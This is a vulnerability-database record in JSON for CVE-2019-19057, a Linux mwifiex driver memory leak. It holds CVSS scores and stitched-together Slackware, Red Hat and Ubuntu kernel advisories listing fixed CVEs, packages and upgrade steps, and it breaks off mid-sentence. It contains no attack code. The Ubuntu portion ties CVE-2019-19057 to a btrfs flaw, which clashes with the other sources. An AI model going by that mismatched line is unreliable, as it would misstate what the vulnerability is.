      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu,Red Hat,Slackware Security Team",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-19057",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-19057",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "LOW",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "LOW",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19057",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1078",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-19057",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19057"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1078"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19057"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.208/*:  Upgraded. \n   IPV6_MULTIPLE_TABLES n -\u003e y\n  +IPV6_SUBTREES y\n  These updates fix various bugs and security issues. \n  Be sure to upgrade your initrd after upgrading the kernel packages. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.203:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19524\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15917\n    Fixed in 4.4.204:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18660\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15291\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18683\n    Fixed in 4.4.206:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12614\n    Fixed in 4.4.207:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19227\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19062\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19338\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19332\n    Fixed in 4.4.208:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19057\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19063\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-smp-4.4.208_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-smp-4.4.208_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-smp-4.4.208_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\nef3ab53561656d90c19389bed7f883ea  kernel-generic-4.4.208-i586-1.txz\nce33ac504adf47d140c3d9ffbf7589b2  kernel-generic-smp-4.4.208_smp-i686-1.txz\n2fb222e279ceacf6e3af294a1cce54e9  kernel-headers-4.4.208_smp-x86-1.txz\nc237d6708a9d59080deb5a6659d1acf1  kernel-huge-4.4.208-i586-1.txz\n29018038f4e0510dfa7e9cdfe69c994a  kernel-huge-smp-4.4.208_smp-i686-1.txz\n6518395d78e7c7b323bd964dd3b9ed13  kernel-modules-4.4.208-i586-1.txz\n440885e37ee410473bf1c9a6b028dd8b  kernel-modules-smp-4.4.208_smp-i686-1.txz\n969021b83f0cb73d7b745b3d77bdbee0  kernel-source-4.4.208_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\nd6edb0754c752aaf8fcbd8d4d5bfc30a  kernel-generic-4.4.208-x86_64-1.txz\n10255231f7085336046b49e829bf972c  kernel-headers-4.4.208-x86-1.txz\n369fa14fb7f59f1e903402be3ad685e7  kernel-huge-4.4.208-x86_64-1.txz\nb8c8261fbb6bed66c3ded3aa36e206df  kernel-modules-4.4.208-x86_64-1.txz\n83f37ca83c19fe8d1a785c93cc1ad6f5  kernel-source-4.4.208-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.208-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.208 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2020:1769-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:1769\nIssue date:        2020-04-28\nCVE Names:         CVE-2018-16871 CVE-2019-8980 CVE-2019-10639\n                   CVE-2019-15090 CVE-2019-15099 CVE-2019-15221\n                   CVE-2019-17053 CVE-2019-17055 CVE-2019-18805\n                   CVE-2019-19057 CVE-2019-19073 CVE-2019-19074\n                   CVE-2019-19534 CVE-2019-19768 CVE-2019-19922\n                   CVE-2020-1749\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c\n(CVE-2019-19768)\n\n* kernel: nfs: NULL pointer dereference due to an anomalized NFS message\nsequence (CVE-2018-16871)\n\n* kernel: memory leak in the kernel_read_file function in fs/exec.c allows\nto cause a denial of service (CVE-2019-8980)\n\n* kernel: unprivileged users able to create RAW sockets  in AF_IEEE802154\nnetwork protocol. (CVE-2019-17053)\n\n* kernel: unprivileged users able to create RAW sockets in AF_ISDN  network\nprotocol. (CVE-2019-17055)\n\n* kernel: integer overflow in tcp_ack_update_rtt in net/ipv4/tcp_input.c\n(CVE-2019-18805)\n\n* kernel: information leak bug caused  by a malicious USB device in the\ndrivers/net/can/usb/peak_usb/pcan_usb_core.c driver (CVE-2019-19534)\n\n* kernel: some ipv6 protocols not encrypted over ipsec tunnel. \n(CVE-2020-1749)\n\n* Kernel: net: using kernel space address bits to derive IP ID may\npotentially break KASLR (CVE-2019-10639)\n\n* kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to\ncrash or information disclosure (CVE-2019-15090)\n\n* kernel: a NULL pointer dereference in\ndrivers/net/wireless/ath/ath10k/usb.c leads to a crash (CVE-2019-15099)\n\n* kernel: Null pointer dereference in the sound/usb/line6/pcm.c\n(CVE-2019-15221)\n\n* kernel: Two memory leaks in the mwifiex_pcie_init_evt_ring() function in\ndrivers/net/wireless/marvell/mwifiex/pcie.c allows for a DoS\n(CVE-2019-19057)\n\n* kernel: Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the\nLinux kernel (DOS) (CVE-2019-19073)\n\n* kernel: a memory leak in the ath9k management function in allows local\nDoS (CVE-2019-19074)\n\n* kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial\nof service against non-cpu-bound applications (CVE-2019-19922)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nThis update also fixes several bugs and adds various enhancements. \nDocumentation for these changes is available from the Release Notes\ndocument linked to in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1655162 - CVE-2018-16871 kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence\n1679972 - CVE-2019-8980 kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service\n1729933 - CVE-2019-10639 Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR\n1738741 - L2 guest hit kernel panic when do L1-\u003eL1 live migration on PML-enabled intel host\n1743526 - CVE-2019-15090 kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure\n1743560 - CVE-2019-15099 kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash\n1749633 - kernel: brk can grow the heap into the area reserved for the stack\n1749974 - CVE-2019-15221 kernel: Null pointer dereference in the sound/usb/line6/pcm.c\n1752765 - conntrack tool delete entry with CIDR crash\n1757902 - fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITSd\n1758242 - CVE-2019-17053 kernel: unprivileged users able to create RAW sockets  in AF_IEEE802154 network protocol. \n1758248 - CVE-2019-17055 kernel: unprivileged users able to create RAW sockets in AF_ISDN  network protocol. \n1765547 - Fallocate on XFS may discard concurrent AIO write\n1767664 - Backport CIFS stale ESTALE handling and dentry revalidation patches\n1771430 - svcrdma: Increase the default connection credit limit\n1771496 - CVE-2019-18805 kernel: integer overflow in tcp_ack_update_rtt in net/ipv4/tcp_input.c\n1771691 - Process killed while opening a file can result in leaked open handle on the server\n1774933 - CVE-2019-19074 kernel: a memory leak in the ath9k management function in allows local DoS\n1774937 - CVE-2019-19073 kernel: Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux kernel (DOS)\n1775050 - CVE-2019-19057 kernel: Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows for a DoS\n1783540 - CVE-2019-19534 kernel: information leak bug caused  by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver\n1786164 - CVE-2019-19768 kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c\n1789594 - kernel: Wrong FE0/FE1 MSR restore in signal handlers on ppc64le\n1792512 - CVE-2019-19922 kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications\n1795049 - RHEL8: Latency issue on Kubernetes / k8s / OpenShift\n1803162 - [NFS] Dataloss with copy_file_range on NFS-mounted files that is not 4K aligned  on RHEL 8. \n1809833 - CVE-2020-1749 kernel: some ipv6 protocols not encrypted over ipsec tunnel. \n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-193.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-193.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-4.18.0-193.el8.aarch64.rpm\nkernel-core-4.18.0-193.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-193.el8.aarch64.rpm\nkernel-debug-4.18.0-193.el8.aarch64.rpm\nkernel-debug-core-4.18.0-193.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-193.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-193.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-193.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-193.el8.aarch64.rpm\nkernel-devel-4.18.0-193.el8.aarch64.rpm\nkernel-headers-4.18.0-193.el8.aarch64.rpm\nkernel-modules-4.18.0-193.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-193.el8.aarch64.rpm\nkernel-tools-4.18.0-193.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-193.el8.aarch64.rpm\nperf-4.18.0-193.el8.aarch64.rpm\nperf-debuginfo-4.18.0-193.el8.aarch64.rpm\npython3-perf-4.18.0-193.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-193.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-whitelists-4.18.0-193.el8.noarch.rpm\nkernel-doc-4.18.0-193.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-193.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-4.18.0-193.el8.ppc64le.rpm\nkernel-core-4.18.0-193.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-193.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-193.el8.ppc64le.rpm\nkernel-devel-4.18.0-193.el8.ppc64le.rpm\nkernel-headers-4.18.0-193.el8.ppc64le.rpm\nkernel-modules-4.18.0-193.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-193.el8.ppc64le.rpm\nkernel-tools-4.18.0-193.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-193.el8.ppc64le.rpm\nperf-4.18.0-193.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-193.el8.ppc64le.rpm\npython3-perf-4.18.0-193.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-193.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-193.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-193.el8.s390x.rpm\nkernel-4.18.0-193.el8.s390x.rpm\nkernel-core-4.18.0-193.el8.s390x.rpm\nkernel-cross-headers-4.18.0-193.el8.s390x.rpm\nkernel-debug-4.18.0-193.el8.s390x.rpm\nkernel-debug-core-4.18.0-193.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.s390x.rpm\nkernel-debug-devel-4.18.0-193.el8.s390x.rpm\nkernel-debug-modules-4.18.0-193.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-193.el8.s390x.rpm\nkernel-debuginfo-4.18.0-193.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-193.el8.s390x.rpm\nkernel-devel-4.18.0-193.el8.s390x.rpm\nkernel-headers-4.18.0-193.el8.s390x.rpm\nkernel-modules-4.18.0-193.el8.s390x.rpm\nkernel-modules-extra-4.18.0-193.el8.s390x.rpm\nkernel-tools-4.18.0-193.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-193.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-193.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-193.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-193.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-193.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-193.el8.s390x.rpm\nperf-4.18.0-193.el8.s390x.rpm\nperf-debuginfo-4.18.0-193.el8.s390x.rpm\npython3-perf-4.18.0-193.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-193.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-193.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-4.18.0-193.el8.x86_64.rpm\nkernel-core-4.18.0-193.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-193.el8.x86_64.rpm\nkernel-debug-4.18.0-193.el8.x86_64.rpm\nkernel-debug-core-4.18.0-193.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-193.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-193.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-193.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-193.el8.x86_64.rpm\nkernel-devel-4.18.0-193.el8.x86_64.rpm\nkernel-headers-4.18.0-193.el8.x86_64.rpm\nkernel-modules-4.18.0-193.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-193.el8.x86_64.rpm\nkernel-tools-4.18.0-193.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-193.el8.x86_64.rpm\nperf-4.18.0-193.el8.x86_64.rpm\nperf-debuginfo-4.18.0-193.el8.x86_64.rpm\npython3-perf-4.18.0-193.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-193.el8.x86_64.rpm\n\nRed Hat CodeReady Linux Builder (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-193.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-193.el8.aarch64.rpm\nperf-debuginfo-4.18.0-193.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-193.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-193.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-193.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-193.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-193.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-193.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-193.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-193.el8.x86_64.rpm\nperf-debuginfo-4.18.0-193.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-193.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXqhVdNzjgjWX9erEAQhD/w//dPnDo2yo4d8QrzWDVVkXPNxRzhSCh7Rc\nvCtSYPB6YMydkKglUvdHS+ZGv+N/1xs8CTpAZ59q3NTiw2FdkCPfSuJiTwdCyOwc\nxars8lYLd2yKv/yhHXh5HDOloRRK26cKANvpUXFJCmbOq/muSEyhRTKKG2t+Iijn\nlMzS6BIheasfjupsy3K2JGeZCjKlH7u1yulJVH4BaQZ/K04NxKjOWGnZ9eAoP6gp\nAwPGT9YYT3Eg24NTaUVHBsrWMF7ybDkWuRav8TBHT8Uukoztjmypi/5C925tbVGM\nLn36s+wfwPuytgos3JcjYVFhAzPwdtay99ZlXukeJlVXBc/AZEqkE3tp1dOUz5o/\nQwjX2TByLMa6XAMWtNjW8AOcx30VuG73EoYNussB/J9+1eeehj7VpdAp/AWQm7q0\ndHe0U6Pzm48vWLvuBzuc1JLC87ssbIC1n4WrfyUm86ECT8WZ4TsF8FZwlrzMB8Au\nwPMo9RHXb4gU9WgSfdikOvZy8DnyUfSIPnlyK71iaa7rqRlPVWM/XqDq7so7KF1o\n3dE9bquitvi5H8/sEsgRGiqA6tb1Lh+mjhbE5FQxAggKnXz83UpJjk9aSL3dj+yY\nW1XxCp5lPPLclygA8lo7sqgD6RCBjWxzyGZBK0SoLzv2qHzrhxBeM0mOmhH7xRb5\nN2G5/HRp5K8=0ugo\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-4287-2\nFebruary 18, 2020\n\nlinux-azure vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-azure: Linux kernel for Microsoft Azure Cloud systems\n\nDetails:\n\nUSN-4287-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nkernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM. \n\nIt was discovered that the Linux kernel did not properly clear data\nstructures on context switches for certain Intel graphics processors. A\nlocal attacker could use this to expose sensitive information. \n(CVE-2019-14615)\n\nIt was discovered that the Atheros 802.11ac wireless USB device driver in\nthe Linux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-15099)\n\nIt was discovered that the HSA Linux kernel driver for AMD GPU devices did\nnot properly check for errors in certain situations, leading to a NULL\npointer dereference. A local attacker could possibly use this to cause a\ndenial of service. (CVE-2019-16229)\n\nIt was discovered that the Marvell 8xxx Libertas WLAN device driver in the\nLinux kernel did not properly check for errors in certain situations,\nleading to a NULL pointer dereference. A local attacker could possibly use\nthis to cause a denial of service. (CVE-2019-16232)\n\nIt was discovered that a race condition existed in the Virtual Video Test\nDriver in the Linux kernel. An attacker with write access to /dev/video0 on\na system with the vivid module loaded could possibly use this to gain\nadministrative privileges. (CVE-2019-18683)\n\nIt was discovered that the Renesas Digital Radio Interface (DRIF) driver in\nthe Linux kernel did not properly initialize data. A local attacker could\npossibly use this to expose sensitive information (kernel memory). \n(CVE-2019-18786)\n\nIt was discovered that the Afatech AF9005 DVB-T USB device driver in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-18809)\n\nIt was discovered that the btrfs file system in the Linux kernel did not\nproperly validate metadata, leading to a NULL pointer dereference. An\nattacker could use this to specially craft a file system image that, when\nmounted, could cause a denial of service (system crash). (CVE-2019-19057)\n\nIt was discovered that the crypto subsystem in the Linux kernel did not\nproperly deallocate memory in certain error conditions. \n(CVE-2019-19062)\n\nIt was discovered that the Realtek rtlwifi USB device driver in the Linux\nkernel did not properly deallocate memory in certain error conditions. (CVE-2019-19063)\n\nIt was discovered that the RSI 91x WLAN device driver in the Linux kernel\ndid not properly deallocate memory in certain error conditions. (CVE-2019-19071)\n\nIt was discovered that the Atheros 802.11ac wireless USB device driver in\nthe Linux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-19078)\n\nIt 